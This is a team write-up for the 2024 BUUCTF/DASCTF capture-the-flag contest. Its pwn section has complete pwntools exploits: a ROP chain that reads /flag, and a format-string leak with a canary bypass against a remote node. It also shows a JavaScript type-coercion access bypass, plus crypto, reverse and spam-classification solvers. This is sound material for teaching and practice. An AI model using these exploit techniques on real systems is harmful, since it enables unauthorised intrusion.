2024 BUUCTF Lilac2 Team WriteUp

Menu

  1. Ranking
  2. Solutions
    • PWN
      • Control
      • Exception
    • WEB
      • cool_index
    • Crypto
      • The_Mystery_of_Math
    • Reverse
      • prese
    • MISC
      • BadMes

Ranking

13th place

Solutions

PWN

Control

First, look at main.

The gift function only reads 0x10 bytes.

Then, in vuln, there is a stack overflow.

Overflow the buffer all the way to the saved rip and jump to the gift location. Take care to restore the _Unwind_RaiseException pointer so the exception is caught correctly, then ROP.

p.send(flat(
    b'f'*0x20,             # padding
    b'/flag\x00\x00\x00',  # "/flag" string used as open's path argument
    pop_rdi, flag_addr,
    pop_rsi, 0,
    pop_rdx, 0,
    open, # open("/flag", 0, 0)
    pop_rdi, 3,
    pop_rsi, bss_addr,
    pop_rdx, 0x100,
    read, # read(3, bss_addr, 0x100) -- fd 3 is the freshly opened flag
    pop_rdi, 1,
    pop_rsi, bss_addr,
    pop_rdx, 0x100,
    write # write(1, bss_addr, 0x100)
))

Full exp:

from pwn import *
# p = remote("node5.buuoj.cn",25728)
p = process("./control")
context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']

bss_addr = 0x4D4400
bss_addr2 = 0x4D3100

gift_addr = 0x4D3350
magic_addr = 0x402183

sys_read = 0x4621A7

obj_point = 0x4D3320
p.sendlineafter("Gift> ",flat(0x4d33a0,magic_addr))
payload = b'a'*0x70 + p64(gift_addr)
p.sendlineafter("How much do you know about control?", payload)

flag_addr = gift_addr

read = 0x462170
write = 0x462210
open = 0x462040
pop_rdi = 0x0000000000401c72
pop_rsi = 0x0000000000405285
pop_rdx = 0x0000000000401aff

# pause()

p.send(flat(
    b'f'*0x20,
    b'/flag\x00\x00\x00',
    pop_rdi, flag_addr,
    pop_rsi, 0,
    pop_rdx, 0,
    open, # open
    pop_rdi, 3,
    pop_rsi, bss_addr,
    pop_rdx, 0x100,
    read, # read
    pop_rdi, 1,
    pop_rsi, bss_addr,
    pop_rdx, 0x100,
    write
))
# gdb.attach(p)
p.interactive()

Exception

zephyr@zephyr-virtual-machine:~/studyingtable/basctf/aa$ checksec exception
[*] '/home/zephyr/studyingtable/basctf/aa/exception'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

All protections are enabled, but there is a format string vulnerability.

Construct a payload to leak the addresses we need:

printf_payload =  b'%p-%p-%p-%p-%p-%p-%p-%19$p-'

Then, as before, take care to restore the _Unwind_RaiseException pointer; and since there is a canary, we should control rbp and restore the canary.

Finally, ROP:

from pwn import *
from LibcSearcher import *
# p = process('./exception')
p = remote("node5.buuoj.cn",28637)
context.terminal = ['tmux','splitw','-h']
# elf = ELF('./easyFMT')
context.arch = 'amd64'
context.log_level = 'debug'
printf_payload =  b'%p-%p-%p-%p-%p-%p-%p-%19$p-'
p.sendafter("please tell me your name\n",printf_payload)
leak = p.recvline().decode('utf-8').split("-")

print(leak)

# each base = leaked runtime address - (leak - mapping base) offset recorded in a debug run
elf_base = int(leak[0], 16) - (0x6433b8b6d060 - 0x6433b8b6c000) - 0x3000
libc_base = int(leak[2], 16) - (0x7f5a392ae1f2 - 0x7f5a391a0000)
ld_base = int(leak[4], 16) - (0x7f86e8789d60 - 0x7f86e8778000)
canary = int(leak[6], 16)
stack_leak = int(leak[7], 16)

what_addr = elf_base + 0x613e02e46408 - 0x613e02e45000

pop_rdi = elf_base + 0x00000000000014e3
pop_rsi_r15 = elf_base + 0x00000000000014e1

payload = flat(
    b'a' * 0x70,
    stack_leak - 0x2918 + 0x18,  # controlled rbp, used to restore the canary
    what_addr,
    # padding
    b'a'*0x28,
    pop_rdi,
    libc_base + 0x00000000001b45bd,
    pop_rsi_r15,
    0,
    0,
    libc_base + 0x7378c9f70290 - 0x7378c9f1e000,
)
p.sendlineafter("How much do you know about exception?",payload)

p.interactive()

WEB

cool_index

From the challenge attachment, we find the handler for the POST request in server.js. We want execution to reach articles[index]:

app.post("/article", (req, res) => {
    const token = req.cookies.token;
    if (token) {
        try {
            const decoded = jwt.verify(token, JWT_SECRET);
            let index = req.body.index;
            if (req.body.index < 0) {
                return res.status(400).json({ message: "你知道我要说什么" });
            }
            if (decoded.subscription !== "premium" && index >= 7) {
                return res
                    .status(403)
                    .json({ message: "订阅高级会员以解锁" });
            }
            index = parseInt(index);
            if (Number.isNaN(index) || index > articles.length - 1) {
                return res.status(400).json({ message: "你知道我要说什么" });
            }

            return res.json(articles[index]);
        } catch (error) {
            res.clearCookie("token");
            return res.status(403).json({ message: "重新登录罢" });
        }
    } else {
        return res.status(403).json({ message: "未登录" });
    }
});

We need to bypass the checks above. Before index = parseInt(index) runs, index is not necessarily a number, so we can abuse JavaScript's weak typing: POST a JSON body whose index field is the string "7-1". Both guards pass, since "7-1" < 0 and "7-1" >= 7 each coerce the string to NaN and evaluate to false, while parseInt("7-1") yields 7. That lets us read the 8th article, which, as the code shows, contains the flag.
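
A minimal sketch of the request (the URL is hypothetical, and token must be any valid non-premium JWT obtained by logging in normally):

import requests

token = "eyJ..."  # placeholder: a valid JWT issued by the site after login

r = requests.post(
    "http://target:3000/article",  # hypothetical address
    json={"index": "7-1"},         # "7-1" < 0 and "7-1" >= 7 both coerce to NaN, i.e. false
    cookies={"token": token},
)
print(r.json())                    # articles[7], which contains the flag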

Crypto

The_Mystery_of_Math

First, analyze the program's source code. The program turns an expression into an integer as follows: it randomly assigns each symbol a value between 1 and 30, takes the first n primes as bases (n being the length of the expression), and, going left to right, raises each prime to the value of the corresponding symbol. The product of these prime powers maps the expression uniquely to a large integer.
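
Concretely (a minimal sketch; VALUES stands in for the challenge's secret symbol-to-value table, which is exactly what we need to recover):

from sympy import prime

VALUES = {'p': 14, 'q': 19, '∧': 15}  # example values, not the real table

def encode(expr):
    # encode(expr) = product over i of prime(i+1) ** VALUES[expr[i]]
    n = 1
    for i, ch in enumerate(expr):
        n *= prime(i + 1) ** VALUES[ch]
    return n

print(encode('p∧q'))  # 2**14 * 3**15 * 5**19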

The flag is encrypted with RSA, and the RSA prime p is derived from the integer of a random expression. The expression is known but the symbol-to-value mapping is not, so the crux is recovering the integer assigned to each character.

When we feed the program an expression, it returns the greatest common divisor of the integers for the expression's conjunctive and disjunctive normal forms. Since gcd(prod p_i^a_i, prod p_i^b_i) = prod p_i^min(a_i, b_i), factoring this GCD reveals, position by position, the smaller of the two symbol values. We factor the GCD with the yafu tool and record the multiplicity of each factor.
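
First, a quick sanity check of that property (reusing the hypothetical encode() and VALUES from the sketch above; sympy's factorint stands in for yafu at this scale):

from math import gcd
from sympy import factorint

# per prime, the gcd keeps the smaller of the two exponents
g = gcd(encode('p∧q'), encode('q∧p'))
print(factorint(g))  # {2: 14, 3: 15, 5: 14} with the example VALUES

The counting script for the yafu output of the real GCD: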

from sympy import nextprime

def generate_primes(count, start=2):
    primes = []
    tmp = start

    while len(primes) < count:
        primes.append(tmp)
        tmp = nextprime(tmp)

    return primes

# count how many times each prime factor appears in the yafu output
number_counts = {}
with open('./ans.txt', 'r',encoding='utf-8') as file:
    for line in file:
        number = int(line.split('=')[1].strip())
        if number in number_counts:
            number_counts[number] += 1
        else:
            number_counts[number] = 1

# num[i] = multiplicity of the i-th prime (dummy entry at index 0)
num = [-1]
for number, count in number_counts.items():
    num.append(count)

The expression I input, its principal conjunctive and disjunctive normal forms, and the random expression are listed below. I chose this expression because, while fairly simple, it covers most of the symbols that appear in the random expression.

raw = 'p∨q∧r'
m = '(﹁p∧q∧r)∨(p∧﹁q∧﹁r)∨(p∧﹁q∧' # the part of m longer than M carries no information
M = '(p∨q∨r)∧(p∨q∨﹁r)∧(p∨﹁q∨r)'
rand = '(q∨﹁r)→(p→p∨r)'

After factoring the GCD of the two normal forms, the count of the n-th prime is the smaller of the values of the n-th symbols of the two forms. The data here is small enough to print the columns in order and analyze by hand:

m    M    min
(    (    5
﹁    p    14
p    ∨    14
∧    q    15
q    ∨    19
∧    r    6
r    )    2
)    ∧    2
∨    (    5
(    p    5
p    ∨    14
∧    q    15
﹁    ∨    20
q    ﹁    19
∧    r    6
﹁    )    2
r    ∧    6
)    (    2
∨    p    14
(    ∨    5
p    ﹁    14
∧    q    15
﹁    ∨    20
q    r    6
∧    )    2

This determines the values of most characters, but '﹁' and '∨' cannot be told apart; we only know that one of them is 20. '→' is completely undetermined, because conjunctive and disjunctive normal forms cannot contain the '→' symbol. For the undetermined symbols we simply enumerate.

All that remains is to enumerate the undetermined symbols and try the RSA decryption:

from Crypto.Util.number import long_to_bytes

# '∨' is fixed to 20; enumerate candidates for '﹁' (place1) and '→' (place2)
gns = []
for place1 in range(13,31):
    for place2 in range(0,31):
        gn = 1
        values = {'(':5, ')':2, 'p':14, 'r':6, 'q':19, '∧':15, '﹁':place1 , '∨':20, '→':place2}
        primes = generate_primes(len(rand))
        for c, prime in zip(rand, primes):
            gn *= prime ** values[c]
        gns.append(gn)

for gn in gns:
    p = nextprime(gn)
    e = 65537
    n = 1137172127284369869803689158992369690490272208110182565787939818165586740154880578406597461267011790008597261169944837957168668588905713734156386454097253259560926131330841143782785931705121705907269192799801169819886097624110623526117632976309320685269484987335153165692227879393589856721546968658115495141290955001293027886716654490810821263924351
    if n % p != 0:  # wrong guess: this p does not divide n
        continue
    c = 1058860053870470008834107468308481975669782076474124562760310285239556043301978327253471653377850236556602688507075644885204045048193626604548693160652201424296163254345857462646915821147545877162409743044223130692594237475439082678732619900813415713826096465652015239899141704769841905515808661190090689683470897855298118376530279528761852705750452
    q = n // p
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)
    m = pow(c, d, n)

# m is left over from the candidate whose p divides n
flag = str(long_to_bytes(m))
print(flag)

Decryption succeeds and we get the flag: DASCTF{a205a1b0-0534-4f8b-b0c2-720079e08b3e}

Reverse

prese

Opening the attachment in IDA and looking at the program's call graph, it is clearly OLLVM-obfuscated. After deobfuscating with the D-810 plugin, the exp is as follows:

for t in range(32):  # brute-force the unknown key byte
    print(t)
    # build the lookup table: mem[index] = ~(t ^ index) & 0xff
    mem = []
    for index in range(256):
        mem.append(~((t ^ index) & 0xff) & 0xff)
    print(mem)
    flag = ''
    f = [0x86, 0x83, 0x91, 0x81, 0x96, 0x84, 0xB9, 0xA5, 0xAD, 0xAD, 0xA6, 0x9D, 0xB6, 0xAA, 0xA7, 0x9D, 0xB0, 0xA7, 0x9D, 0xAB, 0xB1, 0x9D, 0xA7, 0xA3, 0xB1, 0xBB, 0xAA, 0xAA, 0xAA, 0xAA, 0xBF, 0x00]
    for i in range(len(f)):
        v = f[i] ^ 0x22  # undo the final xor, then invert the table
        for j in range(len(mem)):
            if mem[j] == v:
                flag = flag + chr(j & 0xff)
    print(flag)

We get the flag: DASCTF{good_the_re_is_easyhhhh}

MISC

BadMes

Looking at the dataset, there are only messages and no labels, so we first use a Transformer + K-means to cluster the messages and assign labels:

import tensorflow as tf
from tensorflow.keras.layers import TextVectorization, Embedding, MultiHeadAttention, Dense, LayerNormalization, Dropout, GlobalAveragePooling1D, Input
from tensorflow.keras.models import Model
import pandas as pd
import chardet
from sklearn.cluster import KMeans
import numpy as np

# open the file, ignoring decoding errors
with open('data_2.csv', 'r', encoding='gb2312', errors='ignore') as file:
    data = pd.read_csv(file)
texts = data['message'].astype(str).tolist()

# preprocessing: text vectorization
max_tokens = 20000
max_len = 256
text_vectorization = TextVectorization(max_tokens=max_tokens, output_sequence_length=max_len)
text_vectorization.adapt(texts)

# Transformer Block Layer
class TransformerBlock(tf.keras.layers.Layer):
    def __init__(self, embed_dim, num_heads, ff_dim, rate=0.1):
        super(TransformerBlock, self).__init__()
        self.att = MultiHeadAttention(num_heads=num_heads, key_dim=embed_dim)
        self.ffn = tf.keras.Sequential(
            [Dense(ff_dim, activation="relu"), Dense(embed_dim)]
        )
        self.layernorm1 = LayerNormalization(epsilon=1e-6)
        self.layernorm2 = LayerNormalization(epsilon=1e-6)
        self.dropout1 = Dropout(rate)
        self.dropout2 = Dropout(rate)

    def call(self, inputs, training=False):
        attn_output = self.att(inputs, inputs)
        attn_output = self.dropout1(attn_output, training=training)
        out1 = self.layernorm1(inputs + attn_output)
        ffn_output = self.ffn(out1)
        ffn_output = self.dropout2(ffn_output, training=training)
        return self.layernorm2(out1 + ffn_output)

# build the model
embed_dim = 32  # Embedding size for each token
num_heads = 2  # Number of attention heads
ff_dim = 32  # Hidden layer size in feed forward network inside transformer

inputs = Input(shape=(), dtype=tf.string)  # each input is a single string
x = text_vectorization(inputs)
x = Embedding(max_tokens, embed_dim)(x)
x = TransformerBlock(embed_dim, num_heads, ff_dim)(x)
x = GlobalAveragePooling1D()(x)

model = Model(inputs=inputs, outputs=x)

# compute the embedding representation of the texts, feeding the raw text directly
x_embeddings = model.predict(texts)  # pass the raw text list directly

# apply K-means clustering
kmeans = KMeans(n_clusters=2, random_state=42)
kmeans.fit(x_embeddings)
cluster_labels = kmeans.labels_  # get the cluster labels

# attach the clustering result to the original data
data['cluster'] = cluster_labels
data.to_csv('saved.csv')
print(data.head())

After manually correcting some of the labels, we train the Transformer. A sample of the corrected data (message,cluster):

message,cluster
到达目的地后全车x个人开始腹泻,0
是浙江建德市低压电器产业生态的真实变迁,0
胡萝卜素增加3倍、维生素Bl2增加4倍、维生素C增加4,0
高管都需要KPI就没资格做高管,0
护士一检查惊呼怎么牙都蛀成这样了,0
x.x-x.x来张家边苏宁!抢美的空调! 预存xx元:最低=xxx元,最高=xxxx元!预约电话:李店长:xxxxxxxxxxx,1
火箭休赛期总结:可冲击西部冠军惧怕三劲敌,0
中国陆军总兵力有步兵182个师、另加46个独立旅,0
可是黑龙江的贪官腐败分子怎么就揪不出来呀,0
喜欢?卫星15052350470,0
除非因疾病的非正常原因或到法定退休年龄退出,0
发个QQ消息让所有同学回学校办理,0
【hongkee旗舰店】#女人节大促温暖登场#全场x.x折起,新款x.x折仍可用优惠券,x.x当日更有iphonexplus等大奖等亲来拿!,1
破获盗窃电线、电动机等案件10起,0

The training script:

import pandas as pd
import numpy as np
import tensorflow as tf
from tensorflow.keras.layers import TextVectorization, Embedding, MultiHeadAttention, Dense, LayerNormalization, Dropout, GlobalAveragePooling1D, Input
from tensorflow.keras.models import Model
from sklearn.model_selection import train_test_split

def data_generator(filename, batch_size):
    while True:
        texts, labels = [], []
        with open(filename, 'r', encoding='utf-8') as file:
            next(file)  # skip the file header (if present)
            for line in file:
                if len(texts) == batch_size:
                    yield (np.array(texts), np.array(labels))
                    texts, labels = [], []  # reset for the next batch
                index, label, message = line.strip().split('\t')
                texts.append(message)
                labels.append(int(label))
            if texts:
                yield (np.array(texts), np.array(labels))  # yield the final partial batch

# Define TextVectorization outside the model to adapt it on a sample dataset
sample_texts = ['Sample text data for vectorization.']  # Example text
text_vectorization = TextVectorization(max_tokens=10000, output_sequence_length=128)
text_vectorization.adapt(sample_texts)

# Transformer Block Layer
class TransformerBlock(tf.keras.layers.Layer):
    def __init__(self, embed_dim, num_heads, ff_dim, rate=0.1):
        super(TransformerBlock, self).__init__()
        self.att = MultiHeadAttention(num_heads=num_heads, key_dim=embed_dim)
        self.ffn = tf.keras.Sequential([
            Dense(ff_dim, activation="relu"), 
            Dense(embed_dim)
        ])
        self.layernorm1 = LayerNormalization(epsilon=1e-6)
        self.layernorm2 = LayerNormalization(epsilon=1e-6)
        self.dropout1 = Dropout(rate)
        self.dropout2 = Dropout(rate)

    def call(self, inputs, training=False):
        attn_output = self.att(inputs, inputs)
        attn_output = self.dropout1(attn_output, training=training)
        out1 = self.layernorm1(inputs + attn_output)
        ffn_output = self.ffn(out1)
        ffn_output = self.dropout2(ffn_output, training=training)
        return self.layernorm2(out1 + ffn_output)

# Model building
embed_dim = 32
num_heads = 2
ff_dim = 32
inputs = Input(shape=(), dtype=tf.string)  # each input is expected to be a single string
x = text_vectorization(inputs)  # apply text vectorization to the input

x = Embedding(10000, embed_dim)(x)
x = TransformerBlock(embed_dim, num_heads, ff_dim)(x)
x = GlobalAveragePooling1D()(x)
outputs = Dense(1, activation='sigmoid')(x)
model = Model(inputs=inputs, outputs=outputs)

model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])

# Training model using generator
train_gen = data_generator('80w.txt', batch_size=32)
valid_gen = data_generator('80w.txt', batch_size=32)  # Ideally, use a separate validation file or method

model.fit(train_gen, steps_per_epoch=100, epochs=200, validation_data=valid_gen, validation_steps=10)

# # test data generator
# test_gen = data_generator('test_data.txt', 32)  # assumes a separate test dataset file

# # evaluate the model using the generator
# test_loss, test_acc = model.evaluate(test_gen, steps=10)  # make sure enough test steps are provided
# print(f"Test Accuracy: {test_acc}")

# Save model
model.save("transformer_binary_classification_model")

Then write a socket client script and run it in a loop against the server:

import socket
import tensorflow as tf
import numpy as np

# load the whole model (assuming the TextVectorization layer was saved with it)
model = tf.keras.models.load_model("transformer_binary_classification_model")

# connect to the nc server
host = '4.216.46.225'  # server IP address
port = 2333  # server port

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((host, port))
    print("Connected to nc server.")

    try:
        while True:
            # receive a message from the nc server
            received_data = s.recv(1024).decode("utf-8")
            if not received_data:
                print("No more data from server. Exiting.")
                break
            print("Received message from nc server:", received_data)

            # process the received message
            processed_data = np.array([received_data])  # wrap the message in a NumPy array
            prediction = model.predict(processed_data)[0][0]  # run the classifier
            result = 1 if prediction > 0.55 else 0  # convert the prediction to 0 or 1

            # send the classification result back to the nc server
            s.sendall(str(result).encode("utf-8"))
            print("Classification result sent to nc server.")
    except KeyboardInterrupt:
        print("Disconnected from server.")
    except Exception as e:
        print(f"An error occurred: {e}")

After training for 300 rounds, accuracy reaches 95.8%; in the best run, 261/300 messages were classified correctly.

DASCTF{OB0b73eC3VVpvbadnne3}